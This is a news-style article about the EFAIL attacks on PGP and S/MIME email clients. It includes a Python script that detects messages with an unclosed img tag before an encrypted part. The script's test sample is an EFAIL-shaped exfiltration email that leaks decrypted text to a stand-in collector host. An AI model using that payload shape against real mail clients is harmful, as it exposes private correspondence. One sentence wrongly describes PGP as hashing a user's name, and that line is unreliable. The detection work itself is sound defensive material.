German researchers have found a major vulnerability in PGP (Pretty Good Privacy), a popular email encryption program, which could reveal past and present encrypted emails. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The Foundation, which has been in communication with the researchers, has advised users to "temporarily stop sending and especially reading PGP-encrypted email".
"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.
Essentially, an attacker sends a message made of three parts: an opening HTML img tag that is left unclosed, a block of previously captured ciphertext, and the closing HTML for the image tag. When a vulnerable client decrypts the middle part and renders the whole message as one HTML document, the decrypted text ends up inside the image's URL and is sent to the attacker's server when the image is fetched.
EFAIL covers two different types of attack. In either case the attacker must first obtain an encrypted message and then get its sender or one of its recipients to open a new attacker-sent email.
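The three-part shape described above is something a mail gateway or client plugin can check for before any decryption happens. The following Python script is an added example, not code from the original article or from the EFAIL researchers: it parses a raw MIME message and flags a text/html part whose last img tag is never closed when that part is immediately followed by an encrypted part (PGP/MIME, S/MIME, or inline PGP armor in a text part). The two sample messages, their addresses and the ciphertext placeholder are constructed for the demonstration.

```python
import email
from email import policy
from email.message import EmailMessage

# MIME types that carry an encrypted body which the client would decrypt in place.
ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime"}
PGP_ARMOR = b"-----BEGIN PGP MESSAGE-----"


def has_unclosed_img(html: str) -> bool:
    """True if the last <img tag in the HTML fragment is never terminated by '>'."""
    idx = html.lower().rfind("<img")
    return idx != -1 and ">" not in html[idx:]


def is_encrypted_part(part: EmailMessage) -> bool:
    """True for PGP/MIME or S/MIME containers, or for a text part holding PGP armor."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    if part.is_multipart():
        return any(is_encrypted_part(p) for p in part.iter_parts())
    payload = part.get_payload(decode=True) or b""
    return PGP_ARMOR in payload


def find_efail_shape(raw: str) -> list:
    """Return a description of every HTML part whose open img tag would wrap
    the encrypted part that follows it; an empty list means no such shape."""
    msg = email.message_from_string(raw, policy=policy.default)
    parts = list(msg.iter_parts()) if msg.is_multipart() else [msg]
    findings = []
    for i, part in enumerate(parts):
        if part.get_content_type() != "text/html":
            continue
        if not has_unclosed_img(part.get_content()):
            continue
        if i + 1 < len(parts) and is_encrypted_part(parts[i + 1]):
            findings.append(
                f"part {i}: unclosed <img> tag immediately precedes encrypted part {i + 1}"
            )
    return findings


# Constructed sample: unclosed img tag, then an encrypted part, then the closing quote and bracket.
EFAIL_SHAPED = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed sample, not a real message
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset="utf-8"

<img src="http://collector.example.invalid/
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
(constructed placeholder, not real ciphertext)
-----END PGP MESSAGE-----
--inner--
--outer
Content-Type: text/html; charset="utf-8"

">
--outer--
"""

# Constructed sample: an ordinary HTML part with a properly closed img tag before an encrypted part.
BENIGN = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed benign sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset="utf-8"

<p>See the encrypted part below.</p><img src="cid:logo">
--outer
Content-Type: text/plain; charset="utf-8"

-----BEGIN PGP MESSAGE-----
(constructed placeholder, not real ciphertext)
-----END PGP MESSAGE-----
--outer--
"""

if __name__ == "__main__":
    for name, raw in (("EFAIL_SHAPED", EFAIL_SHAPED), ("BENIGN", BENIGN)):
        print(name, find_efail_shape(raw) or "no suspicious shape")
```

The check is deliberately structural rather than content-based: it never decrypts anything and does not need the recipient's key, so it can run on a gateway or in a client before the decryption plugin sees the message. It complements, rather than replaces, the report's advice to disable HTML rendering, since a client that shows HTML as plain text never assembles the image URL in the first place.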
Werner Koch, the author of GnuPG, a widely used implementation of the OpenPGP standard, said the vulnerability lies not in the encryption protocols but in the email clients used to decrypt messages. "The attack has a large surface, since for each encrypted email sent to n recipients, there are n + 1 mail clients that are susceptible to our attack", the abstract of the research paper reads.
EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.
The EFAIL report lists additional steps users can take to reduce the likelihood of falling prey to these attacks, namely decrypting S/MIME and PGP messages outside the email client in a separate application, and disabling HTML rendering altogether.
PGP, for example, works using an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.
In the longer term, they said, patches for email client plugins and changes to the OpenPGP and S/MIME standards could prevent such problems. The developer of NeoPG noted on Twitter that "The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress".